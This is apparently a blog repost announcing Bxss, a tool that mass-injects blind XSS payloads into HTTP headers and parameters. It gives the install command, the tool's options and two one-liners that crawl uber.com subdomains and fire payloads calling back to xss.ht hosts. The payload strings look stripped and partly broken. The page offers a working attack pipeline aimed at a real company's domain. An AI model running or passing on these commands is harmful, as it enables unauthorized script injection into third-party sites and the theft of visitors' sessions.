Bxss – A Blind XSS Injector Tool

KitPloit – PenTest Tools!–

A Blind XSS Injector tool

Features

Inject Blind XSS payloads into custom headers
Inject Blind XSS payloads into parameters
Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
Tool Chaining
Really fast
Easy to setup

Install

$ go get -u github.com/ethicalhackingplayground/bxss

Arguments



          ____
         |  _ \
         | |_) |_  _____ ___
         |  _ <\ \/ / __/ __|
         | |_) |>  <\__ \__ \
         |____//_/\_\___/___/


        -- Coded by @z0idsec --
  -appendMode
        Append the payload to the parameter
  -concurrency int
        Set the concurrency (default 30)
  -header string
        Set the custom header (default "User-Agent")
  -parameters
        Test the parameters for blind xss
  -payload string
        the blind XSS payload

Blind XSS In Parameters

$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '">https://hacker.xss.ht' -parameters

Blind XSS In X-Forwarded-For Header

$ subfinder uber.com | gau | bxss -payload '">https://z0id.xss.ht' -header "X-Forwarded-For"

Download Bxss

View original article on KitPloit – PenTest Tools!

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Address never made public)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

Related

Leave a Reply Cancel reply